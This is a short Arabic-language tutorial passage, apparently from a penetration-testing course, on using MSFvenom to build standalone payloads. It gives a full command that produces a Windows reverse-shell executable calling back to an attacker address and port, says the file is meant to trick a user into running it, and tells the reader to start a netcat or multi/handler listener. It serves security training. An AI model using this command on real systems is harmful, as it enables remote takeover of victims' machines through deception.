MSFvenom: إنشاء الـ Payloads المستقلة
بينما يتعامل Metasploit مع الـ payloads تلقائياً أثناء الاستغلال، قد تحتاج أحياناً إلى إنشاء ملف تنفيذي خبيث مستقل (مثلاً لخداع مستخدم للنقر عليه، أو رفعه عبر ثغرة رفع ملفات).
MSFvenom هو مزيج من منشئ الـ payloads (msfpayload) والمشفِّر (msfencode).
المعلمات الرئيسية
-p: تحديد الـ payload (مثلاًlinux/x86/shell_reverse_tcp).LHOSTوLPORT: عنوان IP ومنفذ المهاجم.-f: تنسيق المخرج (مثلاًexe,elf,raw).-o: اسم ملف المخرج.
مثال: إنشاء Reverse Shell لنظام Windows
bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe
مهمة: بعد إنشاء هذا الـ payload، يجب عليك إعداد مستمع (listener) مقابل (باستخدام netcat أو multi/handler في Metasploit) لاستقبال الاتصال عندما ينفذ الهدف الملف.